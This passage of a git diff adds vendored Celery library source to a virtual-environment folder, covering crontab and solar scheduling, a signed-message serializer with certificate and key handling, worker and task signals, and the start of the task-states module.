(list(range(fr, self.min_ + self.max_)) + + list(range(self.min_, to + 1))) + return list(range(fr, to + 1)) + return [fr] + + def _range_steps(self, toks: Sequence[str]) -> list[int]: + if len(toks) != 3 or not toks[2]: + raise self.ParseException('empty filter') + return self._expand_range(toks[:2])[::int(toks[2])] + + def _star_steps(self, toks: Sequence[str]) -> list[int]: + if not toks or not toks[0]: + raise self.ParseException('empty filter') + return self._expand_star()[::int(toks[0])] + + def _expand_star(self, *args: Any) -> list[int]: + return list(range(self.min_, self.max_ + self.min_)) + + def _expand_number(self, s: str) -> int: + if isinstance(s, str) and s[0] == '-': + raise self.ParseException('negative numbers not supported') + try: + i = int(s) + except ValueError: + try: + i = weekday(s) + except KeyError: + raise ValueError(f'Invalid weekday literal {s!r}.') + + max_val = self.min_ + self.max_ - 1 + if i > max_val: + raise ValueError( + f'Invalid end range: {i} > {max_val}.') + if i < self.min_: + raise ValueError( + f'Invalid beginning range: {i} < {self.min_}.') + + return i + + +class crontab(BaseSchedule): + """Crontab schedule. + + A Crontab can be used as the ``run_every`` value of a + periodic task entry to add :manpage:`crontab(5)`-like scheduling. + + Like a :manpage:`cron(5)`-job, you can specify units of time of when + you'd like the task to execute. It's a reasonably complete + implementation of :command:`cron`'s features, so it should provide a fair + degree of scheduling needs. + + You can specify a minute, an hour, a day of the week, a day of the + month, and/or a month in the year in any of the following formats: + + .. attribute:: minute + + - A (list of) integers from 0-59 that represent the minutes of + an hour of when execution should occur; or + - A string representing a Crontab pattern. This may get pretty + advanced, like ``minute='*/15'`` (for every quarter) or + ``minute='1,13,30-45,50-59/2'``. + + .. attribute:: hour + + - A (list of) integers from 0-23 that represent the hours of + a day of when execution should occur; or + - A string representing a Crontab pattern. This may get pretty + advanced, like ``hour='*/3'`` (for every three hours) or + ``hour='0,8-17/2'`` (at midnight, and every two hours during + office hours). + + .. attribute:: day_of_week + + - A (list of) integers from 0-6, where Sunday = 0 and Saturday = + 6, that represent the days of a week that execution should + occur. + - A string representing a Crontab pattern. This may get pretty + advanced, like ``day_of_week='mon-fri'`` (for weekdays only). + (Beware that ``day_of_week='*/2'`` does not literally mean + 'every two days', but 'every day that is divisible by two'!) + + .. attribute:: day_of_month + + - A (list of) integers from 1-31 that represents the days of the + month that execution should occur. + - A string representing a Crontab pattern. This may get pretty + advanced, such as ``day_of_month='2-30/2'`` (for every even + numbered day) or ``day_of_month='1-7,15-21'`` (for the first and + third weeks of the month). + + .. attribute:: month_of_year + + - A (list of) integers from 1-12 that represents the months of + the year during which execution can occur. + - A string representing a Crontab pattern. This may get pretty + advanced, such as ``month_of_year='*/3'`` (for the first month + of every quarter) or ``month_of_year='2-12/2'`` (for every even + numbered month). + + .. attribute:: nowfun + + Function returning the current date and time + (:class:`~datetime.datetime`). + + .. attribute:: app + + The Celery app instance. + + It's important to realize that any day on which execution should + occur must be represented by entries in all three of the day and + month attributes. For example, if ``day_of_week`` is 0 and + ``day_of_month`` is every seventh day, only months that begin + on Sunday and are also in the ``month_of_year`` attribute will have + execution events. Or, ``day_of_week`` is 1 and ``day_of_month`` + is '1-7,15-21' means every first and third Monday of every month + present in ``month_of_year``. + """ + + def __init__(self, minute: str = '*', hour: str = '*', day_of_week: str = '*', + day_of_month: str = '*', month_of_year: str = '*', **kwargs: Any) -> None: + self._orig_minute = cronfield(minute) + self._orig_hour = cronfield(hour) + self._orig_day_of_week = cronfield(day_of_week) + self._orig_day_of_month = cronfield(day_of_month) + self._orig_month_of_year = cronfield(month_of_year) + self._orig_kwargs = kwargs + self.hour = self._expand_cronspec(hour, 24) + self.minute = self._expand_cronspec(minute, 60) + self.day_of_week = self._expand_cronspec(day_of_week, 7) + self.day_of_month = self._expand_cronspec(day_of_month, 31, 1) + self.month_of_year = self._expand_cronspec(month_of_year, 12, 1) + super().__init__(**kwargs) + + @staticmethod + def _expand_cronspec( + cronspec: int | str | Iterable, + max_: int, min_: int = 0) -> set[Any]: + """Expand cron specification. + + Takes the given cronspec argument in one of the forms: + + .. code-block:: text + + int (like 7) + str (like '3-5,*/15', '*', or 'monday') + set (like {0,15,30,45} + list (like [8-17]) + + And convert it to an (expanded) set representing all time unit + values on which the Crontab triggers. Only in case of the base + type being :class:`str`, parsing occurs. (It's fast and + happens only once for each Crontab instance, so there's no + significant performance overhead involved.) + + For the other base types, merely Python type conversions happen. + + The argument ``max_`` is needed to determine the expansion of + ``*`` and ranges. The argument ``min_`` is needed to determine + the expansion of ``*`` and ranges for 1-based cronspecs, such as + day of month or month of year. The default is sufficient for minute, + hour, and day of week. + """ + if isinstance(cronspec, int): + result = {cronspec} + elif isinstance(cronspec, str): + result = crontab_parser(max_, min_).parse(cronspec) + elif isinstance(cronspec, set): + result = cronspec + elif isinstance(cronspec, Iterable): + result = set(cronspec) # type: ignore + else: + raise TypeError(CRON_INVALID_TYPE.format(type=type(cronspec))) + + # assure the result does not precede the min or exceed the max + for number in result: + if number >= max_ + min_ or number < min_: + raise ValueError(CRON_PATTERN_INVALID.format( + min=min_, max=max_ - 1 + min_, value=number)) + return result + + def _delta_to_next(self, last_run_at: datetime, next_hour: int, + next_minute: int) -> ffwd: + """Find next delta. + + Takes a :class:`~datetime.datetime` of last run, next minute and hour, + and returns a :class:`~celery.utils.time.ffwd` for the next + scheduled day and time. + + Only called when ``day_of_month`` and/or ``month_of_year`` + cronspec is specified to further limit scheduled task execution. + """ + datedata = AttributeDict(year=last_run_at.year) + days_of_month = sorted(self.day_of_month) + months_of_year = sorted(self.month_of_year) + + def day_out_of_range(year: int, month: int, day: int) -> bool: + try: + datetime(year=year, month=month, day=day) + except ValueError: + return True + return False + + def is_before_last_run(year: int, month: int, day: int) -> bool: + return self.maybe_make_aware( + datetime(year, month, day, next_hour, next_minute), + naive_as_utc=False) < last_run_at + + def roll_over() -> None: + for _ in range(2000): + flag = (datedata.dom == len(days_of_month) or + day_out_of_range(datedata.year, + months_of_year[datedata.moy], + days_of_month[datedata.dom]) or + (is_before_last_run(datedata.year, + months_of_year[datedata.moy], + days_of_month[datedata.dom]))) + + if flag: + datedata.dom = 0 + datedata.moy += 1 + if datedata.moy == len(months_of_year): + datedata.moy = 0 + datedata.year += 1 + else: + break + else: + # Tried 2000 times, we're most likely in an infinite loop + raise RuntimeError('unable to rollover, ' + 'time specification is probably invalid') + + if last_run_at.month in self.month_of_year: + datedata.dom = bisect(days_of_month, last_run_at.day) + datedata.moy = bisect_left(months_of_year, last_run_at.month) + else: + datedata.dom = 0 + datedata.moy = bisect(months_of_year, last_run_at.month) + if datedata.moy == len(months_of_year): + datedata.moy = 0 + roll_over() + + while 1: + th = datetime(year=datedata.year, + month=months_of_year[datedata.moy], + day=days_of_month[datedata.dom]) + if th.isoweekday() % 7 in self.day_of_week: + break + datedata.dom += 1 + roll_over() + + return ffwd(year=datedata.year, + month=months_of_year[datedata.moy], + day=days_of_month[datedata.dom], + hour=next_hour, + minute=next_minute, + second=0, + microsecond=0) + + def __repr__(self) -> str: + return CRON_REPR.format(self) + + def __reduce__(self) -> tuple[type, tuple[str, str, str, str, str], Any]: + return (self.__class__, (self._orig_minute, + self._orig_hour, + self._orig_day_of_week, + self._orig_day_of_month, + self._orig_month_of_year), self._orig_kwargs) + + def __setstate__(self, state: Mapping[str, Any]) -> None: + # Calling super's init because the kwargs aren't necessarily passed in + # the same form as they are stored by the superclass + super().__init__(**state) + + def remaining_delta(self, last_run_at: datetime, tz: tzinfo | None = None, + ffwd: type = ffwd) -> tuple[datetime, Any, datetime]: + # caching global ffwd + last_run_at = self.maybe_make_aware(last_run_at) + now = self.maybe_make_aware(self.now()) + dow_num = last_run_at.isoweekday() % 7 # Sunday is day 0, not day 7 + + execute_this_date = ( + last_run_at.month in self.month_of_year and + last_run_at.day in self.day_of_month and + dow_num in self.day_of_week + ) + + execute_this_hour = ( + execute_this_date and + last_run_at.day == now.day and + last_run_at.month == now.month and + last_run_at.year == now.year and + last_run_at.hour in self.hour and + last_run_at.minute < max(self.minute) + ) + + if execute_this_hour: + next_minute = min(minute for minute in self.minute + if minute > last_run_at.minute) + delta = ffwd(minute=next_minute, second=0, microsecond=0) + else: + next_minute = min(self.minute) + execute_today = (execute_this_date and + last_run_at.hour < max(self.hour)) + + if execute_today: + next_hour = min(hour for hour in self.hour + if hour > last_run_at.hour) + delta = ffwd(hour=next_hour, minute=next_minute, + second=0, microsecond=0) + else: + next_hour = min(self.hour) + all_dom_moy = (self._orig_day_of_month == '*' and + self._orig_month_of_year == '*') + if all_dom_moy: + next_day = min([day for day in self.day_of_week + if day > dow_num] or self.day_of_week) + add_week = next_day == dow_num + + delta = ffwd( + weeks=add_week and 1 or 0, + weekday=(next_day - 1) % 7, + hour=next_hour, + minute=next_minute, + second=0, + microsecond=0, + ) + else: + delta = self._delta_to_next(last_run_at, + next_hour, next_minute) + return self.to_local(last_run_at), delta, self.to_local(now) + + def remaining_estimate( + self, last_run_at: datetime, ffwd: type = ffwd) -> timedelta: + """Estimate of next run time. + + Returns when the periodic task should run next as a + :class:`~datetime.timedelta`. + """ + # pylint: disable=redefined-outer-name + # caching global ffwd + return remaining(*self.remaining_delta(last_run_at, ffwd=ffwd)) + + def is_due(self, last_run_at: datetime) -> tuple[bool, datetime]: + """Return tuple of ``(is_due, next_time_to_run)``. + + If :setting:`beat_cron_starting_deadline` has been specified, the + scheduler will make sure that the `last_run_at` time is within the + deadline. This prevents tasks that could have been run according to + the crontab, but didn't, from running again unexpectedly. + + Note: + Next time to run is in seconds. + + SeeAlso: + :meth:`celery.schedules.schedule.is_due` for more information. + """ + + rem_delta = self.remaining_estimate(last_run_at) + rem_secs = rem_delta.total_seconds() + rem = max(rem_secs, 0) + due = rem == 0 + + deadline_secs = self.app.conf.beat_cron_starting_deadline + has_passed_deadline = False + if deadline_secs is not None: + # Make sure we're looking at the latest possible feasible run + # date when checking the deadline. + last_date_checked = last_run_at + last_feasible_rem_secs = rem_secs + while rem_secs < 0: + last_date_checked = last_date_checked + abs(rem_delta) + rem_delta = self.remaining_estimate(last_date_checked) + rem_secs = rem_delta.total_seconds() + if rem_secs < 0: + last_feasible_rem_secs = rem_secs + + # if rem_secs becomes 0 or positive, second-to-last + # last_date_checked must be the last feasible run date. + # Check if the last feasible date is within the deadline + # for running + has_passed_deadline = -last_feasible_rem_secs > deadline_secs + if has_passed_deadline: + # Should not be due if we've passed the deadline for looking + # at past runs + due = False + + if due or has_passed_deadline: + rem_delta = self.remaining_estimate(self.now()) + rem = max(rem_delta.total_seconds(), 0) + return schedstate(due, rem) + + def __eq__(self, other: Any) -> bool: + if isinstance(other, crontab): + return ( + other.month_of_year == self.month_of_year and + other.day_of_month == self.day_of_month and + other.day_of_week == self.day_of_week and + other.hour == self.hour and + other.minute == self.minute and + super().__eq__(other) + ) + return NotImplemented + + +def maybe_schedule( + s: int | float | timedelta | BaseSchedule, relative: bool = False, + app: Celery | None = None) -> float | timedelta | BaseSchedule: + """Return schedule from number, timedelta, or actual schedule.""" + if s is not None: + if isinstance(s, (float, int)): + s = timedelta(seconds=s) + if isinstance(s, timedelta): + return schedule(s, relative, app=app) + else: + s.app = app + return s + + +class solar(BaseSchedule): + """Solar event. + + A solar event can be used as the ``run_every`` value of a + periodic task entry to schedule based on certain solar events. + + Notes: + + Available event values are: + + - ``dawn_astronomical`` + - ``dawn_nautical`` + - ``dawn_civil`` + - ``sunrise`` + - ``solar_noon`` + - ``sunset`` + - ``dusk_civil`` + - ``dusk_nautical`` + - ``dusk_astronomical`` + + Arguments: + event (str): Solar event that triggers this task. + See note for available values. + lat (float): The latitude of the observer. + lon (float): The longitude of the observer. + nowfun (Callable): Function returning the current date and time + as a class:`~datetime.datetime`. + app (Celery): Celery app instance. + """ + + _all_events = { + 'dawn_astronomical', + 'dawn_nautical', + 'dawn_civil', + 'sunrise', + 'solar_noon', + 'sunset', + 'dusk_civil', + 'dusk_nautical', + 'dusk_astronomical', + } + _horizons = { + 'dawn_astronomical': '-18', + 'dawn_nautical': '-12', + 'dawn_civil': '-6', + 'sunrise': '-0:34', + 'solar_noon': '0', + 'sunset': '-0:34', + 'dusk_civil': '-6', + 'dusk_nautical': '-12', + 'dusk_astronomical': '18', + } + _methods = { + 'dawn_astronomical': 'next_rising', + 'dawn_nautical': 'next_rising', + 'dawn_civil': 'next_rising', + 'sunrise': 'next_rising', + 'solar_noon': 'next_transit', + 'sunset': 'next_setting', + 'dusk_civil': 'next_setting', + 'dusk_nautical': 'next_setting', + 'dusk_astronomical': 'next_setting', + } + _use_center_l = { + 'dawn_astronomical': True, + 'dawn_nautical': True, + 'dawn_civil': True, + 'sunrise': False, + 'solar_noon': False, + 'sunset': False, + 'dusk_civil': True, + 'dusk_nautical': True, + 'dusk_astronomical': True, + } + + def __init__(self, event: str, lat: int | float, lon: int | float, ** + kwargs: Any) -> None: + self.ephem = __import__('ephem') + self.event = event + self.lat = lat + self.lon = lon + super().__init__(**kwargs) + + if event not in self._all_events: + raise ValueError(SOLAR_INVALID_EVENT.format( + event=event, all_events=', '.join(sorted(self._all_events)), + )) + if lat < -90 or lat > 90: + raise ValueError(SOLAR_INVALID_LATITUDE.format(lat=lat)) + if lon < -180 or lon > 180: + raise ValueError(SOLAR_INVALID_LONGITUDE.format(lon=lon)) + + cal = self.ephem.Observer() + cal.lat = str(lat) + cal.lon = str(lon) + cal.elev = 0 + cal.horizon = self._horizons[event] + cal.pressure = 0 + self.cal = cal + + self.method = self._methods[event] + self.use_center = self._use_center_l[event] + + def __reduce__(self) -> tuple[type, tuple[str, int | float, int | float]]: + return self.__class__, (self.event, self.lat, self.lon) + + def __repr__(self) -> str: + return ''.format( + self.event, self.lat, self.lon, + ) + + def remaining_estimate(self, last_run_at: datetime) -> timedelta: + """Return estimate of next time to run. + + Returns: + ~datetime.timedelta: when the periodic task should + run next, or if it shouldn't run today (e.g., the sun does + not rise today), returns the time when the next check + should take place. + """ + last_run_at = self.maybe_make_aware(last_run_at) + last_run_at_utc = localize(last_run_at, timezone.utc) + self.cal.date = last_run_at_utc + try: + if self.use_center: + next_utc = getattr(self.cal, self.method)( + self.ephem.Sun(), + start=last_run_at_utc, use_center=self.use_center + ) + else: + next_utc = getattr(self.cal, self.method)( + self.ephem.Sun(), start=last_run_at_utc + ) + + except self.ephem.CircumpolarError: # pragma: no cover + # Sun won't rise/set today. Check again tomorrow + # (specifically, after the next anti-transit). + next_utc = ( + self.cal.next_antitransit(self.ephem.Sun()) + + timedelta(minutes=1) + ) + next = self.maybe_make_aware(next_utc.datetime()) + now = self.maybe_make_aware(self.now()) + delta = next - now + return delta + + def is_due(self, last_run_at: datetime) -> tuple[bool, datetime]: + """Return tuple of ``(is_due, next_time_to_run)``. + + Note: + next time to run is in seconds. + + See Also: + :meth:`celery.schedules.schedule.is_due` for more information. + """ + rem_delta = self.remaining_estimate(last_run_at) + rem = max(rem_delta.total_seconds(), 0) + due = rem == 0 + if due: + rem_delta = self.remaining_estimate(self.now()) + rem = max(rem_delta.total_seconds(), 0) + return schedstate(due, rem) + + def __eq__(self, other: Any) -> bool: + if isinstance(other, solar): + return ( + other.event == self.event and + other.lat == self.lat and + other.lon == self.lon + ) + return NotImplemented diff --git a/env/Lib/site-packages/celery/security/__init__.py b/env/Lib/site-packages/celery/security/__init__.py new file mode 100644 index 00000000..c801d98b --- /dev/null +++ b/env/Lib/site-packages/celery/security/__init__.py @@ -0,0 +1,74 @@ +"""Message Signing Serializer.""" +from kombu.serialization import disable_insecure_serializers as _disable_insecure_serializers +from kombu.serialization import registry + +from celery.exceptions import ImproperlyConfigured + +from .serialization import register_auth # : need cryptography first + +CRYPTOGRAPHY_NOT_INSTALLED = """\ +You need to install the cryptography library to use the auth serializer. +Please install by: + + $ pip install cryptography +""" + +SECURITY_SETTING_MISSING = """\ +Sorry, but you have to configure the + * security_key + * security_certificate, and the + * security_cert_store +configuration settings to use the auth serializer. + +Please see the configuration reference for more information. +""" + +SETTING_MISSING = """\ +You have to configure a special task serializer +for signing and verifying tasks: + * task_serializer = 'auth' + +You have to accept only tasks which are serialized with 'auth'. +There is no point in signing messages if they are not verified. + * accept_content = ['auth'] +""" + +__all__ = ('setup_security',) + +try: + import cryptography # noqa +except ImportError: + raise ImproperlyConfigured(CRYPTOGRAPHY_NOT_INSTALLED) + + +def setup_security(allowed_serializers=None, key=None, key_password=None, cert=None, store=None, + digest=None, serializer='json', app=None): + """See :meth:`@Celery.setup_security`.""" + if app is None: + from celery import current_app + app = current_app._get_current_object() + + _disable_insecure_serializers(allowed_serializers) + + # check conf for sane security settings + conf = app.conf + if conf.task_serializer != 'auth' or conf.accept_content != ['auth']: + raise ImproperlyConfigured(SETTING_MISSING) + + key = key or conf.security_key + key_password = key_password or conf.security_key_password + cert = cert or conf.security_certificate + store = store or conf.security_cert_store + digest = digest or conf.security_digest + + if not (key and cert and store): + raise ImproperlyConfigured(SECURITY_SETTING_MISSING) + + with open(key) as kf: + with open(cert) as cf: + register_auth(kf.read(), key_password, cf.read(), store, digest, serializer) + registry._set_default_serializer('auth') + + +def disable_untrusted_serializers(whitelist=None): + _disable_insecure_serializers(allowed=whitelist) diff --git a/env/Lib/site-packages/celery/security/certificate.py b/env/Lib/site-packages/celery/security/certificate.py new file mode 100644 index 00000000..80398b39 --- /dev/null +++ b/env/Lib/site-packages/celery/security/certificate.py @@ -0,0 +1,113 @@ +"""X.509 certificates.""" +from __future__ import annotations + +import datetime +import glob +import os +from typing import TYPE_CHECKING, Iterator + +from cryptography.hazmat.backends import default_backend +from cryptography.hazmat.primitives.asymmetric import padding, rsa +from cryptography.x509 import load_pem_x509_certificate +from kombu.utils.encoding import bytes_to_str, ensure_bytes + +from celery.exceptions import SecurityError + +from .utils import reraise_errors + +if TYPE_CHECKING: + from cryptography.hazmat.primitives.asymmetric.dsa import DSAPublicKey + from cryptography.hazmat.primitives.asymmetric.ec import EllipticCurvePublicKey + from cryptography.hazmat.primitives.asymmetric.ed448 import Ed448PublicKey + from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey + from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey + from cryptography.hazmat.primitives.asymmetric.utils import Prehashed + from cryptography.hazmat.primitives.hashes import HashAlgorithm + + +__all__ = ('Certificate', 'CertStore', 'FSCertStore') + + +class Certificate: + """X.509 certificate.""" + + def __init__(self, cert: str) -> None: + with reraise_errors( + 'Invalid certificate: {0!r}', errors=(ValueError,) + ): + self._cert = load_pem_x509_certificate( + ensure_bytes(cert), backend=default_backend()) + + if not isinstance(self._cert.public_key(), rsa.RSAPublicKey): + raise ValueError("Non-RSA certificates are not supported.") + + def has_expired(self) -> bool: + """Check if the certificate has expired.""" + return datetime.datetime.utcnow() >= self._cert.not_valid_after + + def get_pubkey(self) -> ( + DSAPublicKey | EllipticCurvePublicKey | Ed448PublicKey | Ed25519PublicKey | RSAPublicKey + ): + return self._cert.public_key() + + def get_serial_number(self) -> int: + """Return the serial number in the certificate.""" + return self._cert.serial_number + + def get_issuer(self) -> str: + """Return issuer (CA) as a string.""" + return ' '.join(x.value for x in self._cert.issuer) + + def get_id(self) -> str: + """Serial number/issuer pair uniquely identifies a certificate.""" + return f'{self.get_issuer()} {self.get_serial_number()}' + + def verify(self, data: bytes, signature: bytes, digest: HashAlgorithm | Prehashed) -> None: + """Verify signature for string containing data.""" + with reraise_errors('Bad signature: {0!r}'): + + pad = padding.PSS( + mgf=padding.MGF1(digest), + salt_length=padding.PSS.MAX_LENGTH) + + self.get_pubkey().verify(signature, ensure_bytes(data), pad, digest) + + +class CertStore: + """Base class for certificate stores.""" + + def __init__(self) -> None: + self._certs: dict[str, Certificate] = {} + + def itercerts(self) -> Iterator[Certificate]: + """Return certificate iterator.""" + yield from self._certs.values() + + def __getitem__(self, id: str) -> Certificate: + """Get certificate by id.""" + try: + return self._certs[bytes_to_str(id)] + except KeyError: + raise SecurityError(f'Unknown certificate: {id!r}') + + def add_cert(self, cert: Certificate) -> None: + cert_id = bytes_to_str(cert.get_id()) + if cert_id in self._certs: + raise SecurityError(f'Duplicate certificate: {id!r}') + self._certs[cert_id] = cert + + +class FSCertStore(CertStore): + """File system certificate store.""" + + def __init__(self, path: str) -> None: + super().__init__() + if os.path.isdir(path): + path = os.path.join(path, '*') + for p in glob.glob(path): + with open(p) as f: + cert = Certificate(f.read()) + if cert.has_expired(): + raise SecurityError( + f'Expired certificate: {cert.get_id()!r}') + self.add_cert(cert) diff --git a/env/Lib/site-packages/celery/security/key.py b/env/Lib/site-packages/celery/security/key.py new file mode 100644 index 00000000..ae932b2b --- /dev/null +++ b/env/Lib/site-packages/celery/security/key.py @@ -0,0 +1,35 @@ +"""Private keys for the security serializer.""" +from cryptography.hazmat.backends import default_backend +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives.asymmetric import padding, rsa +from kombu.utils.encoding import ensure_bytes + +from .utils import reraise_errors + +__all__ = ('PrivateKey',) + + +class PrivateKey: + """Represents a private key.""" + + def __init__(self, key, password=None): + with reraise_errors( + 'Invalid private key: {0!r}', errors=(ValueError,) + ): + self._key = serialization.load_pem_private_key( + ensure_bytes(key), + password=ensure_bytes(password), + backend=default_backend()) + + if not isinstance(self._key, rsa.RSAPrivateKey): + raise ValueError("Non-RSA keys are not supported.") + + def sign(self, data, digest): + """Sign string containing data.""" + with reraise_errors('Unable to sign data: {0!r}'): + + pad = padding.PSS( + mgf=padding.MGF1(digest), + salt_length=padding.PSS.MAX_LENGTH) + + return self._key.sign(ensure_bytes(data), pad, digest) diff --git a/env/Lib/site-packages/celery/security/serialization.py b/env/Lib/site-packages/celery/security/serialization.py new file mode 100644 index 00000000..c58ef906 --- /dev/null +++ b/env/Lib/site-packages/celery/security/serialization.py @@ -0,0 +1,101 @@ +"""Secure serializer.""" +from kombu.serialization import dumps, loads, registry +from kombu.utils.encoding import bytes_to_str, ensure_bytes, str_to_bytes + +from celery.app.defaults import DEFAULT_SECURITY_DIGEST +from celery.utils.serialization import b64decode, b64encode + +from .certificate import Certificate, FSCertStore +from .key import PrivateKey +from .utils import get_digest_algorithm, reraise_errors + +__all__ = ('SecureSerializer', 'register_auth') + + +class SecureSerializer: + """Signed serializer.""" + + def __init__(self, key=None, cert=None, cert_store=None, + digest=DEFAULT_SECURITY_DIGEST, serializer='json'): + self._key = key + self._cert = cert + self._cert_store = cert_store + self._digest = get_digest_algorithm(digest) + self._serializer = serializer + + def serialize(self, data): + """Serialize data structure into string.""" + assert self._key is not None + assert self._cert is not None + with reraise_errors('Unable to serialize: {0!r}', (Exception,)): + content_type, content_encoding, body = dumps( + bytes_to_str(data), serializer=self._serializer) + # What we sign is the serialized body, not the body itself. + # this way the receiver doesn't have to decode the contents + # to verify the signature (and thus avoiding potential flaws + # in the decoding step). + body = ensure_bytes(body) + return self._pack(body, content_type, content_encoding, + signature=self._key.sign(body, self._digest), + signer=self._cert.get_id()) + + def deserialize(self, data): + """Deserialize data structure from string.""" + assert self._cert_store is not None + with reraise_errors('Unable to deserialize: {0!r}', (Exception,)): + payload = self._unpack(data) + signature, signer, body = (payload['signature'], + payload['signer'], + payload['body']) + self._cert_store[signer].verify(body, signature, self._digest) + return loads(bytes_to_str(body), payload['content_type'], + payload['content_encoding'], force=True) + + def _pack(self, body, content_type, content_encoding, signer, signature, + sep=str_to_bytes('\x00\x01')): + fields = sep.join( + ensure_bytes(s) for s in [signer, signature, content_type, + content_encoding, body] + ) + return b64encode(fields) + + def _unpack(self, payload, sep=str_to_bytes('\x00\x01')): + raw_payload = b64decode(ensure_bytes(payload)) + first_sep = raw_payload.find(sep) + + signer = raw_payload[:first_sep] + signer_cert = self._cert_store[signer] + + # shift 3 bits right to get signature length + # 2048bit rsa key has a signature length of 256 + # 4096bit rsa key has a signature length of 512 + sig_len = signer_cert.get_pubkey().key_size >> 3 + sep_len = len(sep) + signature_start_position = first_sep + sep_len + signature_end_position = signature_start_position + sig_len + signature = raw_payload[ + signature_start_position:signature_end_position + ] + + v = raw_payload[signature_end_position + sep_len:].split(sep) + + return { + 'signer': signer, + 'signature': signature, + 'content_type': bytes_to_str(v[0]), + 'content_encoding': bytes_to_str(v[1]), + 'body': bytes_to_str(v[2]), + } + + +def register_auth(key=None, key_password=None, cert=None, store=None, + digest=DEFAULT_SECURITY_DIGEST, + serializer='json'): + """Register security serializer.""" + s = SecureSerializer(key and PrivateKey(key, password=key_password), + cert and Certificate(cert), + store and FSCertStore(store), + digest, serializer=serializer) + registry.register('auth', s.serialize, s.deserialize, + content_type='application/data', + content_encoding='utf-8') diff --git a/env/Lib/site-packages/celery/security/utils.py b/env/Lib/site-packages/celery/security/utils.py new file mode 100644 index 00000000..4714a945 --- /dev/null +++ b/env/Lib/site-packages/celery/security/utils.py @@ -0,0 +1,28 @@ +"""Utilities used by the message signing serializer.""" +import sys +from contextlib import contextmanager + +import cryptography.exceptions +from cryptography.hazmat.primitives import hashes + +from celery.exceptions import SecurityError, reraise + +__all__ = ('get_digest_algorithm', 'reraise_errors',) + + +def get_digest_algorithm(digest='sha256'): + """Convert string to hash object of cryptography library.""" + assert digest is not None + return getattr(hashes, digest.upper())() + + +@contextmanager +def reraise_errors(msg='{0!r}', errors=None): + """Context reraising crypto errors as :exc:`SecurityError`.""" + errors = (cryptography.exceptions,) if errors is None else errors + try: + yield + except errors as exc: + reraise(SecurityError, + SecurityError(msg.format(exc)), + sys.exc_info()[2]) diff --git a/env/Lib/site-packages/celery/signals.py b/env/Lib/site-packages/celery/signals.py new file mode 100644 index 00000000..290fa2ba --- /dev/null +++ b/env/Lib/site-packages/celery/signals.py @@ -0,0 +1,154 @@ +"""Celery Signals. + +This module defines the signals (Observer pattern) sent by +both workers and clients. + +Functions can be connected to these signals, and connected +functions are called whenever a signal is called. + +.. seealso:: + + :ref:`signals` for more information. +""" + +from .utils.dispatch import Signal + +__all__ = ( + 'before_task_publish', 'after_task_publish', 'task_internal_error', + 'task_prerun', 'task_postrun', 'task_success', + 'task_received', 'task_rejected', 'task_unknown', + 'task_retry', 'task_failure', 'task_revoked', 'celeryd_init', + 'celeryd_after_setup', 'worker_init', 'worker_before_create_process', + 'worker_process_init', 'worker_process_shutdown', 'worker_ready', + 'worker_shutdown', 'worker_shutting_down', 'setup_logging', + 'after_setup_logger', 'after_setup_task_logger', 'beat_init', + 'beat_embedded_init', 'heartbeat_sent', 'eventlet_pool_started', + 'eventlet_pool_preshutdown', 'eventlet_pool_postshutdown', + 'eventlet_pool_apply', +) + +# - Task +before_task_publish = Signal( + name='before_task_publish', + providing_args={ + 'body', 'exchange', 'routing_key', 'headers', + 'properties', 'declare', 'retry_policy', + }, +) +after_task_publish = Signal( + name='after_task_publish', + providing_args={'body', 'exchange', 'routing_key'}, +) +task_received = Signal( + name='task_received', + providing_args={'request'} +) +task_prerun = Signal( + name='task_prerun', + providing_args={'task_id', 'task', 'args', 'kwargs'}, +) +task_postrun = Signal( + name='task_postrun', + providing_args={'task_id', 'task', 'args', 'kwargs', 'retval'}, +) +task_success = Signal( + name='task_success', + providing_args={'result'}, +) +task_retry = Signal( + name='task_retry', + providing_args={'request', 'reason', 'einfo'}, +) +task_failure = Signal( + name='task_failure', + providing_args={ + 'task_id', 'exception', 'args', 'kwargs', 'traceback', 'einfo', + }, +) +task_internal_error = Signal( + name='task_internal_error', + providing_args={ + 'task_id', 'args', 'kwargs', 'request', 'exception', 'traceback', 'einfo' + } +) +task_revoked = Signal( + name='task_revoked', + providing_args={ + 'request', 'terminated', 'signum', 'expired', + }, +) +task_rejected = Signal( + name='task_rejected', + providing_args={'message', 'exc'}, +) +task_unknown = Signal( + name='task_unknown', + providing_args={'message', 'exc', 'name', 'id'}, +) +#: Deprecated, use after_task_publish instead. +task_sent = Signal( + name='task_sent', + providing_args={ + 'task_id', 'task', 'args', 'kwargs', 'eta', 'taskset', + }, +) + +# - Program: `celery worker` +celeryd_init = Signal( + name='celeryd_init', + providing_args={'instance', 'conf', 'options'}, +) +celeryd_after_setup = Signal( + name='celeryd_after_setup', + providing_args={'instance', 'conf'}, +) + +# - Worker +import_modules = Signal(name='import_modules') +worker_init = Signal(name='worker_init') +worker_before_create_process = Signal(name="worker_before_create_process") +worker_process_init = Signal(name='worker_process_init') +worker_process_shutdown = Signal(name='worker_process_shutdown') +worker_ready = Signal(name='worker_ready') +worker_shutdown = Signal(name='worker_shutdown') +worker_shutting_down = Signal(name='worker_shutting_down') +heartbeat_sent = Signal(name='heartbeat_sent') + +# - Logging +setup_logging = Signal( + name='setup_logging', + providing_args={ + 'loglevel', 'logfile', 'format', 'colorize', + }, +) +after_setup_logger = Signal( + name='after_setup_logger', + providing_args={ + 'logger', 'loglevel', 'logfile', 'format', 'colorize', + }, +) +after_setup_task_logger = Signal( + name='after_setup_task_logger', + providing_args={ + 'logger', 'loglevel', 'logfile', 'format', 'colorize', + }, +) + +# - Beat +beat_init = Signal(name='beat_init') +beat_embedded_init = Signal(name='beat_embedded_init') + +# - Eventlet +eventlet_pool_started = Signal(name='eventlet_pool_started') +eventlet_pool_preshutdown = Signal(name='eventlet_pool_preshutdown') +eventlet_pool_postshutdown = Signal(name='eventlet_pool_postshutdown') +eventlet_pool_apply = Signal( + name='eventlet_pool_apply', + providing_args={'target', 'args', 'kwargs'}, +) + +# - Programs +user_preload_options = Signal( + name='user_preload_options', + providing_args={'app', 'options'}, +) diff --git a/env/Lib/site-packages/celery/states.py b/env/Lib/site-packages/celery/states.py new file mode 100644 index 00000000..6e21a22b --- /dev/null +++ b/env/Lib/site-packages/celery/states.py @@ -0,0 +1,151 @@ +"""Built-in task states. + +.. _states: + +States +------ + +See :ref:`task-states`. + +.. _statesets: + +Sets +---- + +.. state:: READY_STATES + +READY_STATES 